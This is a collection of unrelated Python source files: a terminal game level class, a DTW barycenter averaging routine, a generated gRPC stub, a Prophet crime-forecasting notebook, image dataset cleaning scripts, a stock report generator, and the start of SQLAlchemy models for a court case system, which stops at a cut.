    def get_collisions_at(self, time: int) -> Iterable[tuple[HitBox, HitBox]]:
        """Identify all collisions at a given time.

        Two boxes collide when they occupy the same (x, y) cell; the first
        box seen at a cell is paired with each later box at that cell.
        """
        boxes = self.get_boxes_at(time)
        table = {}
        for box in boxes:
            key = (box.pos_x, box.pos_y)
            if key not in table:
                table[key] = box
            else:
                yield table[key], box

    def handle_collisions_at(self, time: int) -> None:
        """Update level state for all collisions.

        Player+Exit wins, Player+(Moving)Wall halts the current Move, and
        Player+Patrol(Vision) marks the player as spotted.  Collisions not
        involving the player are ignored.
        """
        for col in self.get_collisions_at(time):
            box_1, box_2 = col
            # Compare by parent entity *types*, so order does not matter.
            parents = {box_1.parent, box_2.parent}
            if parents == {Player, Exit}:
                self.state[box_1.time] = LevelState.Win
                break
            elif parents == {Player, Wall} or parents == {Player, MovingWall}:
                # Walking into a wall: record the halt time so the Move
                # stops the player at that step.
                action = self.player.get_action_at(box_1.time)
                if isinstance(action, Move):
                    action.halt_times.append(box_1.time)
            elif parents == {Player, Patrol} or parents == {Player, PatrolVision}:
                self.state[box_1.time] = LevelState.Spotted
                break
            else:
                # Entity-entity collisions carry no gameplay consequence.
                pass

    @property
    def map_sequence(self) -> Iterable[MapWindow]:
        """Generate a MapWindow sequence for playback.

        NOTE: consuming this generator mutates ``current_time``; playback
        stops early once a terminal state is reached.
        """
        for t in range(0, self.player.time_consumed + 1):
            self.current_time += 1
            boxes = self.get_boxes_at(t)
            if t == self.player.time_consumed:
                # Ran out of planned actions without reaching the exit.
                self.state[self.current_time] = LevelState.ExitNotReached
            yield MapWindow(
                level_name=self.title,
                level_number=self.number,
                boxes=boxes,
            )
            if self.current_state in LevelState.terminal():
                break

    @property
    def cmd_list(self) -> CmdListwindow:
        """Generate a command list window"""
        return CmdListwindow(
            max_commands=self.max_commands,
            issued_commands=[str(a) for a in self.player.actions],
        )

    @property
    def cmd_help(self) -> CmdHelpWindow:
        """Generate a command help window"""
        return CmdHelpWindow(allowed_commands=self.allowed_commands)

    @property
    def user_input(self) -> UserInputWindow:
        """Generate a user input window"""
        return UserInputWindow(current_input=self.current_input)

    def resolve_collisions(self) -> None:
        """Resolve collisions for the time span of the last action only"""
        last_action = self.player.actions[-1]
        from_time = self.player.time_consumed - last_action.length
        for t in range(from_time, self.player.time_consumed + 1):
            self.handle_collisions_at(t)

    def listen(self, term: Terminal) -> list[Event]:
        """Listen and handle keyboard events.

        Returns the UI events the caller should process; an empty list
        means no relevant key was pressed.
        """
        if key := term.inkey():
            if key.code == const.BACKSPACE:
                self.current_input = self.current_input[:-1]
                return [Event.UpdateInput]
            elif key.code == const.ENTER:
                # Try to parse the typed text into a player action.
                action, flag = action_from_str(self.current_input, self.player)
                if flag and action:
                    self.player.actions.append(action)
                    self.current_input = ""
                    return [
                        Event.UpdateCmdList,
                        Event.UpdateInput,
                        Event.ResolveCollisions,
                    ]
                else:
                    self.current_input = ""
                    return [Event.InvalidInput]
            elif key.code == const.DEBUG_KEY:
                return [Event.StartSequence, Event.EndLevel]
            elif (key.isalnum() or key.isspace()) and len(
                self.current_input
            ) < const.INPUT_MAX_LENGTH:
                # Printable key: append (lower-cased) up to the length cap.
                self.current_input += key.lower()
                return [Event.UpdateInput]
        return []
|
# -*- coding: utf-8 -*-
__author__ = ["chrisholder"]
from typing import Tuple
import numpy as np
from numba import njit
from sktime.clustering.metrics.medoids import medoids
from sktime.distances import distance_alignment_path_factory
from sktime.distances.base import DistanceAlignmentPathCallable
def dba(
    X: np.ndarray,
    max_iters: int = 30,
    tol=1e-5,
    averaging_distance_metric: str = "dtw",
    medoids_distance_metric: str = "dtw",
    precomputed_medoids_pairwise_distance: np.ndarray = None,
    verbose: bool = False,
    **kwargs,
) -> np.ndarray:
    """Compute the dtw barycenter average of time series.

    This implements the 'petitjean' (original) version of the DBA
    algorithm [1]_.

    Parameters
    ----------
    X : np.ndarray (3d array of shape (n, m, p) where n is number of instances, m
        is the dimensions and p is the timepoints))
        Time series instances compute average from.
    max_iters: int, defaults = 30
        Maximum number iterations for dba to update over.
    tol : float (default: 1e-5)
        Tolerance to use for early stopping: if the decrease in cost is lower
        than this value, the Expectation-Maximization procedure stops.
    averaging_distance_metric: str, defaults = 'dtw'
        String that is the distance metric to derive the distance alignment path.
    medoids_distance_metric: str, defaults = 'dtw'
        String that is the distance metric to use with medoids.
    precomputed_medoids_pairwise_distance: np.ndarray (of shape (len(X), len(X)),
        defaults = None
        Precomputed medoids pairwise.
    verbose: bool, defaults = False
        Boolean that controls the verbosity.

    Returns
    -------
    np.ndarray (2d array of shape (m, p) where m is the number of dimensions and p is
        the number of time points.)
        The time series that is the computed average series.

    References
    ----------
    .. [1] <NAME>, <NAME> & <NAME>. A global averaging method
       for dynamic time warping, with applications to clustering. Pattern
       Recognition, Elsevier, 2011, Vol. 44, Num. 3, pp. 678-693
    """
    # Nothing to average for zero or one series.
    # NOTE(review): this returns the 3d input unchanged, not a 2d series as
    # documented above -- confirm callers handle that shape.
    if len(X) <= 1:
        return X
    # Initialise the average with the medoid of X (more robust than the mean).
    center = medoids(
        X,
        distance_metric=medoids_distance_metric,
        precomputed_pairwise_distance=precomputed_medoids_pairwise_distance,
    )
    path_callable = distance_alignment_path_factory(
        X[0], X[1], metric=averaging_distance_metric, **kwargs
    )
    cost_prev = np.inf
    for i in range(max_iters):
        center, cost = _dba_update(center, X, path_callable)
        # Stop when converged within tol, or when cost starts increasing.
        if abs(cost_prev - cost) < tol:
            break
        elif cost_prev < cost:
            break
        else:
            cost_prev = cost
        if verbose:
            print(f"[DBA sktime] epoch {i}, cost {cost}")  # noqa: T001
    return center
@njit(fastmath=True)
def _dba_update(
    center: np.ndarray, X: np.ndarray, path_callable: DistanceAlignmentPathCallable
) -> Tuple[np.ndarray, float]:
    """Perform an update iteration for dba.

    Parameters
    ----------
    center: np.ndarray (2d array of shape (m, p) where m is the number of dimensions
        and p is the number of time point)
        Time series that is the current center (or average).
    X : np.ndarray (3d array of shape (n, m, p) where n is number of instances, m
        is the dimensions and p is the timepoints))
        Time series instances compute average from.
    path_callable: Callable[Union[np.ndarray, np.ndarray], tuple[list[tuple], float]]
        Callable that returns the distance path.

    Returns
    -------
    np.ndarray (2d array of shape (m, p) where m is the number of dimensions and p is
        the number of time points.)
        The time series that is the computed average series.
    float
        Average squared alignment cost per timepoint for this iteration.
    """
    X_size, X_dims, X_timepoints = X.shape
    # counts[k]: how many points (over all series) aligned to center timepoint k.
    # Renamed from ``sum`` so the builtin is not shadowed.
    counts = np.zeros((X_timepoints))
    alignment = np.zeros((X_dims, X_timepoints))
    cost = 0.0
    for i in range(X_size):
        curr_ts = X[i]
        curr_alignment, _ = path_callable(curr_ts, center)
        for j, k in curr_alignment:
            alignment[:, k] += curr_ts[:, j]
            counts[k] += 1
            cost += np.linalg.norm(curr_ts[:, j] - center[:, k]) ** 2
    # NOTE(review): assumes every center timepoint occurs in at least one
    # alignment path (true for full DTW paths); otherwise divides by zero.
    return alignment / counts, cost / X_timepoints
|
<filename>src/govsw/api/vswapi/vswapi_pb2_grpc.py<gh_stars>100-1000
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import vswapi_pb2 as vswapi__pb2
class VswApiStub(object):
    """Client-side stub for the vswapi.VswApi gRPC service.

    Generated by the gRPC Python protocol compiler plugin; regenerate from
    the .proto definition rather than editing by hand.
    """
    # missing associated documentation comment in .proto file
    pass

    def __init__(self, channel):
        """Constructor.

        Args:
          channel: A grpc.Channel.
        """
        # Unary (single request / single response) RPCs.
        self.ModIfname = channel.unary_unary(
            '/vswapi.VswApi/ModIfname',
            request_serializer=vswapi__pb2.ModIfnameRequest.SerializeToString,
            response_deserializer=vswapi__pb2.ModIfnameReply.FromString,
        )
        # Server-streaming RPC: one request, a stream of replies.
        self.GetIfnames = channel.unary_stream(
            '/vswapi.VswApi/GetIfnames',
            request_serializer=vswapi__pb2.GetIfnamesRequest.SerializeToString,
            response_deserializer=vswapi__pb2.GetIfnamesReply.FromString,
        )
        self.ModLink = channel.unary_unary(
            '/vswapi.VswApi/ModLink',
            request_serializer=vswapi__pb2.ModLinkRequest.SerializeToString,
            response_deserializer=vswapi__pb2.ModLinkReply.FromString,
        )
        self.GetLinks = channel.unary_stream(
            '/vswapi.VswApi/GetLinks',
            request_serializer=vswapi__pb2.GetLinksRequest.SerializeToString,
            response_deserializer=vswapi__pb2.GetLinksReply.FromString,
        )
        self.GetStats = channel.unary_stream(
            '/vswapi.VswApi/GetStats',
            request_serializer=vswapi__pb2.GetStatsRequest.SerializeToString,
            response_deserializer=vswapi__pb2.GetStatsReply.FromString,
        )
        self.SaveConfig = channel.unary_unary(
            '/vswapi.VswApi/SaveConfig',
            request_serializer=vswapi__pb2.SaveConfigRequest.SerializeToString,
            response_deserializer=vswapi__pb2.SaveConfigReply.FromString,
        )
class VswApiServicer(object):
    """Server-side skeleton for the vswapi.VswApi gRPC service.

    Generated code: subclass and override the methods below.  Each default
    handler reports UNIMPLEMENTED to the client and raises.
    """
    # missing associated documentation comment in .proto file
    pass

    def ModIfname(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetIfnames(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ModLink(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetLinks(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetStats(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def SaveConfig(self, request, context):
        # missing associated documentation comment in .proto file
        pass
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_VswApiServicer_to_server(servicer, server):
    """Register *servicer*'s RPC handlers for vswapi.VswApi on *server*.

    Generated code: keep handler names and streaming kinds in sync with the
    .proto definition.
    """
    rpc_method_handlers = {
        'ModIfname': grpc.unary_unary_rpc_method_handler(
            servicer.ModIfname,
            request_deserializer=vswapi__pb2.ModIfnameRequest.FromString,
            response_serializer=vswapi__pb2.ModIfnameReply.SerializeToString,
        ),
        'GetIfnames': grpc.unary_stream_rpc_method_handler(
            servicer.GetIfnames,
            request_deserializer=vswapi__pb2.GetIfnamesRequest.FromString,
            response_serializer=vswapi__pb2.GetIfnamesReply.SerializeToString,
        ),
        'ModLink': grpc.unary_unary_rpc_method_handler(
            servicer.ModLink,
            request_deserializer=vswapi__pb2.ModLinkRequest.FromString,
            response_serializer=vswapi__pb2.ModLinkReply.SerializeToString,
        ),
        'GetLinks': grpc.unary_stream_rpc_method_handler(
            servicer.GetLinks,
            request_deserializer=vswapi__pb2.GetLinksRequest.FromString,
            response_serializer=vswapi__pb2.GetLinksReply.SerializeToString,
        ),
        'GetStats': grpc.unary_stream_rpc_method_handler(
            servicer.GetStats,
            request_deserializer=vswapi__pb2.GetStatsRequest.FromString,
            response_serializer=vswapi__pb2.GetStatsReply.SerializeToString,
        ),
        'SaveConfig': grpc.unary_unary_rpc_method_handler(
            servicer.SaveConfig,
            request_deserializer=vswapi__pb2.SaveConfigRequest.FromString,
            response_serializer=vswapi__pb2.SaveConfigReply.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'vswapi.VswApi', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
|
<filename>CS-383_Cloud-Computing_2020-Spring/prophet-forecasting/CloudProjectCode1.py
# import libraries
import boto3, re, sys, math, json, os, sagemaker, urllib.request
from sagemaker import get_execution_role
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from IPython.display import Image
from IPython.display import display
from time import gmtime, strftime
from sagemaker.predictor import csv_serializer
import random
import seaborn as sns
# NOTE(review): the two lines below are IPython/Jupyter shell magics -- this
# file is a notebook export and will NOT run as a plain Python script.
!conda install -c plotly plotly==3.10.0 --yes
!conda install -c conda-forge fbprophet --yes
from fbprophet import Prophet
Prophet()  # smoke-test that fbprophet imported correctly
# Define IAM role
role = get_execution_role()
prefix = 'sagemaker/DEMO-xgboost-dm'
# Region -> XGBoost container image.  NOTE(review): the lookup below raises
# KeyError for any region not listed here -- confirm supported regions.
containers = {'us-west-2': '433757028032.dkr.ecr.us-west-2.amazonaws.com/xgboost:latest',
              'us-east-1': '811284229777.dkr.ecr.us-east-1.amazonaws.com/xgboost:latest',
              'us-east-2': '825641698319.dkr.ecr.us-east-2.amazonaws.com/xgboost:latest',
              'eu-west-1': '685385470294.dkr.ecr.eu-west-1.amazonaws.com/xgboost:latest'} # each region has its XGBoost container
my_region = boto3.session.Session().region_name # set the region of the instance
print("Success - the MySageMakerInstance is in the " + my_region + " region. You will use the " + containers[my_region] + " container for your SageMaker endpoint.")
#Import the dataset
try:
    data = pd.read_csv('WorcesterData_03_19.csv',index_col=0)
    print('Success: Data loaded into dataframe.')
except Exception as e:
    print('Data load error: ',e)
data.head()
# Let's see how many null elements are contained in the data
plt.figure(figsize=(10,10))
sns.heatmap(data.isnull(), cbar = False, cmap = 'YlGnBu')
# Parse the report timestamp column so it can drive resampling.
data.ACTUAL_DTE = pd.to_datetime(data.ACTUAL_DTE, format='%m/%d/%Y %H:%M')
# setting the index to be the date
data.index = pd.DatetimeIndex(data.ACTUAL_DTE)
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('Y').size())
plt.title('Crimes Count Per Year')
plt.xlabel('Years')
plt.ylabel('Number of Crimes')
#Resampling the data
data.resample('M').size()
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('M').size())
plt.title('Crimes Count Per Month')
plt.xlabel('Months')
plt.ylabel('Number of Crimes')
data.resample('Q').size()
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('Q').size())
plt.title('Crimes Count Per Quarter')
plt.xlabel('Quarters')
plt.ylabel('Number of Crimes')
#Preparing the data for the prediction by using prophet
data_prophet = data.resample('M').size().reset_index()
data_prophet
data_prophet.columns = ['Date', 'Crime Count']
data_prophet
data_prophet_df = pd.DataFrame(data_prophet)
data_prophet_df
#renaming the columns in order to adapt it to the prediction
# Prophet requires the time column named 'ds' and the value column named 'y'.
data_prophet_df2 = data_prophet_df.rename(columns={'Date':'ds', 'Crime Count':'y'})
data_prophet_df2
m = Prophet()
m.fit(data_prophet_df2)
# Forcasting into the future
future = m.make_future_dataframe(periods=365)
forecast = m.predict(future)
forecast
#Visualize
figure = m.plot(forecast, xlabel='Date', ylabel='Crime Rate')
#Visualizing the trend for the future years
figure3 = m.plot_components(forecast)
<reponame>isLinXu/DatasetMarkerTool<gh_stars>1-10
# -*-coding:utf-8-*-
'''使用walk方法递归遍历目录文件,walk方法会返回一个三元组,分别是root、dirs和files。
其中root是当前正在遍历的目录路径;dirs是一个列表,包含当前正在遍历的目录下所有的子目录名称,不包含该目录下的文件;
files也是一个列表,包含当前正在遍历的目录下所有的文件,但不包含子目录。
'''
import os
from PIL import Image
import cv2
from utils.fileHelper import os_mkdir
def images_Normalization(path, img_show=True):
    """Resize every image found in leaf directories under *path* to 640x480.

    Each resized copy is written to a ``src/`` subdirectory next to the
    original file.  When *img_show* is true the resized image is displayed
    first; pressing ESC aborts the walk and returns 0.

    :param path: root directory to walk
    :param img_show: show each image before saving (default True)
    :return: 0 when aborted with ESC, otherwise None
    """
    for root, subdirs, filenames in os.walk(path):
        print('################################################################')
        # Only leaf directories (no subdirectories) are processed.
        if subdirs:
            continue
        for filename in filenames:
            file_path = os.path.join(root, filename)
            print('fname', file_path)
            print('name', filename)
            # Load and normalise the image to a fixed 640x480 size.
            resized = cv2.resize(cv2.imread(file_path), (640, 480))
            if img_show:
                cv2.imshow('src_img', resized)
                if (cv2.waitKey() & 0xff) == 27:
                    return 0
            # Store the normalised copy under <root>/src/.
            out_dir = root + '/src/'
            out_path = root + '/src/' + filename
            print('src_dir', out_dir)
            print('src_path', out_path)
            os_mkdir(out_dir)
            cv2.imwrite(out_path, resized)
# Clean collected image data (first-pass wash).
def dataWash(path, r_tag=False, w_min=300, w_max=1000, h_min=300, h_max=1000):
    '''
    Walk every file below *path*, print each image's size and aspect ratio,
    optionally delete images whose size falls in the given range, and show
    each image until a key is pressed (ESC aborts and returns 0).

    :param path: root directory to walk
    :param r_tag: when True, delete images with width in [w_min, w_max) and
        height in [h_min, h_max).  NOTE(review): this removes images *inside*
        the given range -- the condition looks inverted; confirm intent.
    :return: 0 when aborted with ESC, otherwise None
    '''
    global timg, img, w, h
    print('开始遍历......')
    for root, dirs, files in os.walk(path):
        ratelist = []  # aspect ratios seen in this directory
        timglist = []  # image paths seen in this directory
        idict = {}  # NOTE(review): never used
        # First pass: drop files that error out or cannot be opened.
        print('#######################第一次清洗-开始#######################')
        for name in files:
            # NOTE(review): only handles files in directories that still have
            # subdirectories (dataWash_1 checks the opposite) -- confirm.
            if len(dirs) != 0:
                fname = os.path.join(root, name)
                try:
                    timg = os.path.join(root, name)
                    img = Image.open((timg))
                    # image width, height and aspect ratio
                    w = img.width
                    h = img.height
                    rate = w / h
                    print(fname, 'w=', w, 'h=', h, 'rate=', rate)
                    ratelist.append(rate)
                    timglist.append(timg)
                    # Cull images by size (see r_tag note above).
                    if (r_tag):
                        if w in range(w_min, w_max) and h in range(h_min, h_max):
                            os.remove(timg)
                            print('删除图片')
                            print(timg)
                        pass
                    # Show the image, resized for display.
                    src = cv2.imread(fname)
                    cv2.namedWindow('src', cv2.WINDOW_AUTOSIZE)
                    # src = cv2.resize(src, (0, 0), fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST)
                    src = cv2.resize(src, (640, 480))
                    cv2.imshow('src', src)
                    k = cv2.waitKey(0)
                    if k == 27: return 0
                except:
                    # NOTE(review): bare except deletes the file on *any*
                    # failure, even display errors after a successful open.
                    print('删除图片', timg)
                    os.remove(timg)
                img.close()
        print('#######################第一次清洗-结束#######################')
        # print(ratelist)
        ulists = list(set(ratelist))  # unique aspect ratios (currently unused)
        # print(ulists)
# Clean collected image data (interactive variant).
def dataWash_1(path, r_tag=False, w_min=300, w_max=1000, h_min=300, h_max=1000):
    '''
    Walk every file below *path* (leaf directories only), show each image and
    act on a keypress: ESC stops the current directory, SPACE deletes the
    current image, 's' saves a 640x480 copy into a ``src/`` subdirectory.

    :param path: root directory to walk
    :param r_tag: when True, delete images with width in [w_min, w_max) and
        height in [h_min, h_max).  NOTE(review): deletes images *inside* the
        range -- same inversion concern as dataWash; confirm intent.
    :return: None
    '''
    global timg, img, w, h
    print('开始遍历......')
    for root, dirs, files in os.walk(path):
        print('path', path)
        # First pass: drop files that error out or cannot be opened.
        print('#######################第一次清洗-开始#######################')
        for name in files:
            fname = os.path.join(root, name)
            print('fname', fname)
            # Only leaf directories (no subdirectories) are processed.
            if len(dirs) == 0:
                try:
                    timg = os.path.join(root, name)
                    img = Image.open((timg))
                    # image width, height and aspect ratio
                    w = img.width
                    h = img.height
                    rate = w / h
                    print(fname, 'w=', w, 'h=', h, 'rate=', rate)
                    # Cull images by size (see r_tag note above).
                    if (r_tag):
                        if w in range(w_min, w_max) and h in range(h_min, h_max):
                            os.remove(timg)
                            print('删除图片')
                            print(timg)
                        pass
                    # Show the image, resized for display.
                    src = cv2.imread(fname)
                    cv2.namedWindow('src', cv2.WINDOW_AUTOSIZE)
                    # src = cv2.resize(src, (0, 0), fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST)
                    src = cv2.resize(src, (640, 480))
                    cv2.imshow('src', src)
                    # k = cv2.waitKey(0)
                    # if k == 27: return 0
                    key = cv2.waitKey(0)
                    if key == 27:  # ESC: stop processing this directory
                        print('esc break...')
                        cv2.destroyAllWindows()
                        break
                    if key == ord(' '):  # SPACE: delete the current image
                        print('删除当前图片成功')
                        os.remove(timg)
                    if key == ord('s'):
                        # 's': save a resized copy under <root>/src/
                        print('保存当前图片到src目录下')
                        src_dir = root + '/src/'
                        src_path = root + '/src/' + name
                        print('src_dir', src_dir)
                        print('src_path', src_path)
                        os_mkdir(src_dir)
                        cv2.imwrite(src_path, src)
                except:
                    # NOTE(review): bare except deletes the file on *any* failure.
                    print('删除当前图片成功', timg)
                    os.remove(timg)
                img.close()
        print('#######################第一次清洗-结束#######################')
if __name__ == '__main__':
    # Earlier runs pointed at various tower/defect datasets (via dataWash_1
    # and images_Normalization); currently only the sprite dataset is
    # normalised.
    target_dir = '/home/hxzh02/文档/PokeGAN/data/sprites_rgb/'
    images_Normalization(target_dir)
|
<reponame>FriendlyUser/price-prediction
# Hold off on prophet image generation, probably not useful since I buy small caps
import sys
import argparse as ap
import pathlib
import glob
import shutil
from jinja2 import Template
from datetime import date, datetime
from stocks.util import get_config
from stocks.report import make_risk_metrics, \
make_performance_plot, make_estimated_returns, \
make_portfolio_allocations
def main(args):
    """Render an HTML performance report for every portfolio config.

    Reads each ``stocks/cfg/*.yml`` config, computes risk metrics, estimated
    returns, a performance plot and (optionally) portfolio allocations,
    renders them through the Jinja template at ``args.template``, and moves
    the generated files into a dated gh-pages folder under ``args.output``.

    :param args: argparse namespace with ``output`` and ``template`` attributes.
    """
    end_date = str(date.today())
    gh_pages_name = 'gh-pages'
    # Read the shared Jinja template once instead of once per report.
    with open(args.template) as file_:
        template = Template(file_.read())
    for report_cfg_file in glob.glob("stocks/cfg/*.yml"):
        report_cfg = get_config(report_cfg_file)
        options = dict(Version="1.0.0", CurrDate=end_date)
        stocks = report_cfg["stocks"]
        weights = report_cfg["weights"]
        start_date = report_cfg["start_date"]
        report_name = report_cfg["name"]
        # Performance images land in the same directory as index.html, so
        # only relative file names go into the template.
        output_folder = f"{args.output}/{report_name}"
        pathlib.Path(output_folder).mkdir(parents=True, exist_ok=True)
        if isinstance(weights, str):
            # Any string means "equal weighting".  TODO add more types later.
            weights = [1.00 / len(stocks)] * len(stocks)
        # Single call covers both branches (was duplicated in if/else).
        # Adds Var, VaR, CVaR, CDaR.
        risk_metrics = make_risk_metrics(stocks, weights, start_date, end_date)
        options["RISK_METRICS"] = risk_metrics
        options["ESTIMATED_RETURNS"] = make_estimated_returns(stocks, start_date, end_date)
        performance_images = []
        image_name = f"{start_date}_{end_date}_basic.png"
        plot_made = make_performance_plot(
            stocks,
            start_date=start_date,
            end_date=end_date,
            file_name=f"{output_folder}/{image_name}"
        )
        if plot_made is not None:
            performance_images.append(image_name)
        else:
            print(f"PLOT NOT MADE for {image_name} for {report_name}")
        options["PERFORMANCE_IMAGES"] = performance_images
        # Optional portfolio-weight optimization section.
        if "portfolio_opt" in report_cfg:
            portfolio_opt = report_cfg["portfolio_opt"]
            portfolio_allocations = make_portfolio_allocations(
                stocks,
                portfolio_opt,
                start_date,
                end_date
            )
            options["PORTFOLIO_ALLOCATIONS"] = portfolio_allocations
        renderer_template = template.render(**options)
        with open(f"{output_folder}/index.html", "w", errors='ignore') as f:
            f.write(renderer_template)
        # Publish: create the dated gh-pages folder (ok if it exists) and
        # move the report files into it.
        gh_report_folder = f"{args.output}/{gh_pages_name}/{report_name}/{end_date}"
        pathlib.Path(gh_report_folder).mkdir(parents=True, exist_ok=True)
        # Only top-level files are moved; nested folders are not expected.
        for report_file in glob.glob(f"{output_folder}/*"):
            try:
                shutil.move(report_file, gh_report_folder)
            except shutil.Error as e:
                print(e)
# Could make into another function
if __name__ == "__main__":
    # Require f-string-capable Python before doing any work.
    assert sys.version_info >= (3, 6)
    start_time = datetime.now()
    # CLI: where to write reports, and which Jinja template to render with.
    parser = ap.ArgumentParser()
    parser.add_argument("-o", "--output", default="report", help="Output folder")
    parser.add_argument(
        "-t",
        "--template",
        default="stocks/cfg/template.jinja2",
        help="Template file",
    )
    main(parser.parse_args())
    print("Script Complete")
    print(datetime.now() - start_time)
|
# coding: utf-8
# AUTOGENERATED BY gen_script.sh from kp4.py
# Copyright (C) <NAME>, Sun Aug 13 05:04:25 EAT 2017
from sqlalchemy import func
from flask_appbuilder import Model
from flask_appbuilder.models.mixins import AuditMixin, FileColumn, ImageColumn, UserExtensionMixin
from flask_appbuilder.models.decorators import renders
from flask_appbuilder.filemanager import ImageManager
from sqlalchemy_utils import aggregated, force_auto_coercion, observes
from sqlalchemy_continuum import make_versioned
from sqlalchemy_searchable import make_searchable
from sqlalchemy_utils.types import TSVectorType #Searchability look at DocMixin
# ActiveRecord Model Features
from sqlalchemy_mixins import AllFeaturesMixin, ActiveRecordMixin
from sqlalchemy.orm import relationship, query, defer, deferred
# IMPORT Postgresql Specific Types
from sqlalchemy.dialects.postgresql import (
ARRAY, BIGINT, BIT, BOOLEAN, BYTEA, CHAR, CIDR, DATE, DOUBLE_PRECISION,
ENUM, FLOAT, HSTORE, INET, INTEGER, INTERVAL, JSON, JSONB, MACADDR, NUMERIC,
OID, REAL, SMALLINT, TEXT, TIME, TIMESTAMP, UUID, VARCHAR, INT4RANGE,
INT8RANGE, NUMRANGE, DATERANGE, TSRANGE, TSTZRANGE, TSVECTOR)
from sqlalchemy.dialects.postgresql import aggregate_order_by
from sqlalchemy import (Column, Integer, String, ForeignKey, Sequence, Float,
Text, BigInteger, Date, DateTime, Time, Boolean, Index,
CheckConstraint, UniqueConstraint, ForeignKeyConstraint,
Numeric, LargeBinary, Table)
from datetime import timedelta, datetime, date
from sqlalchemy.dialects.postgresql import *
from sqlalchemy.sql import func
from .mixins import *
# Here is how to extend the User model
#class UserExtended(Model, UserExtensionMixin):
# contact_group_id = Column(Integer, ForeignKey('contact_group.id'), nullable=True)
# contact_group = relationship('ContactGroup')
# UTILITY CLASSES
import arrow, enum, datetime
import enum
# Initialize sqlalchemy_utils
#force_auto_coercion()
# Keep versions of all data
make_versioned()
make_searchable()
def future_date(days):
    """Return the current local datetime shifted *days* days into the future."""
    offset = datetime.timedelta(days=days)
    return datetime.datetime.now() + offset
class Bail(AuditMixin, Model):
    """Bail granted to a defendant at a specific hearing."""
    __versioned__ = {}  # row history tracked by sqlalchemy-continuum
    __tablename__ = 'bail'
    id = Column(Integer, primary_key=True, autoincrement=True)
    hearing = Column(ForeignKey(u'hearing.id'), nullable=False, index=True)
    defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
    amountgranted = Column(Numeric(12, 2))  # bail amount, 2 decimal places
    noofsureties = Column(Integer, nullable=False)
    paid = Column(Boolean)
    paydate = Column(Date)
    # ORM links back to the owning defendant/hearing rows.
    defendant1 = relationship(
        u'Defendant',
        primaryjoin='Bail.defendant == Defendant.id',
        backref=u'bails')
    hearing1 = relationship(
        u'Hearing', primaryjoin='Bail.hearing == Hearing.id', backref=u'bails')
    # Many-to-many with Surety via the bail_surety association table below.
    surety = relationship(u'Surety', secondary='bail_surety', backref=u'bails')
# Association table: many-to-many between Bail and Surety.
bail_surety = Table('bail_surety', Model.metadata,
                    Column(
                        'bail',
                        ForeignKey(u'bail.id'),
                        primary_key=True,
                        nullable=False),
                    Column(
                        'surety',
                        ForeignKey(u'surety.id'),
                        primary_key=True,
                        nullable=False,
                        index=True))
class Case(ActivityMixin, AuditMixin, NameMixin, Model):
    """A reported case across its full lifecycle.

    Tracks a case from the initial police report through investigation,
    DPP advice, trial, judgement/sentencing, appeal and closure.
    """
    __versioned__ = {}  # row history tracked by sqlalchemy-continuum
    __tablename__ = 'case'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # --- initial report ---
    police_station_reported = Column(
        ForeignKey(u'policestation.id'), nullable=False, index=True)
    report_date = Column(DateTime, nullable=False, default=func.now())
    complaint = Column(Text, nullable=False)
    is_criminal = Column(Boolean, nullable=True)
    priority = Column(Integer, nullable=False, default=5)
    # --- investigation ---
    investigationassigmentdate = Column(DateTime, default=func.now())
    investigationassignmentnote = Column(Text)
    investigationplan = Column(Text)
    investigationsummary = Column(Text)
    investigationreview = Column(Text)
    investigationcomplete = Column(Boolean)
    # --- DPP advice (presumably Director of Public Prosecutions -- confirm) ---
    dppadvicerequested = Column(Boolean)
    dppadvicedate = Column(Date)
    dppadvice = Column(Text)
    # --- trial ---
    sendtotrial = Column(Boolean, default=False)
    casename = Column(String(400))
    docketnumber = Column(String(100))
    chargesheet = Column(Text, nullable=False)
    chargedate = Column(DateTime, default=func.now())
    judgement = Column(Text)
    judgementdate = Column(DateTime, default=func.now())
    # --- sentencing ---
    sentencelengthyr = Column(Integer)
    sentencelengthmnth = Column(Integer)
    # NOTE(review): misspelled column name kept for schema compatibility.
    senetencelenghtdays = Column(Integer)
    sentencestartdate = Column(Date)
    sentenceexpirydate = Column(Date)
    fineamount = Column(Numeric(12, 2))
    # --- appeal / closure ---
    caseappealed = Column(Boolean)
    appealdate = Column(DateTime, default=func.now())
    appealexpiry = Column(Date)
    caseclosed = Column(Boolean)
    closedate = Column(Date)
    reported_to = Column(ForeignKey(u'polofficer.id'), index=True)
    # --- relationships (association tables are defined below this class) ---
    policestation = relationship(
        u'Policestation',
        primaryjoin='Case.police_station_reported == Policestation.id',
        backref=u'cases')
    polofficer = relationship(
        u'Polofficer',
        primaryjoin='Case.reported_to == Polofficer.id',
        backref=u'polofficer_polofficer_cases')
    natureofsuit = relationship(
        u'Natureofsuit', secondary='case_natureofsuit', backref=u'cases')
    polofficer1 = relationship(
        u'Polofficer',
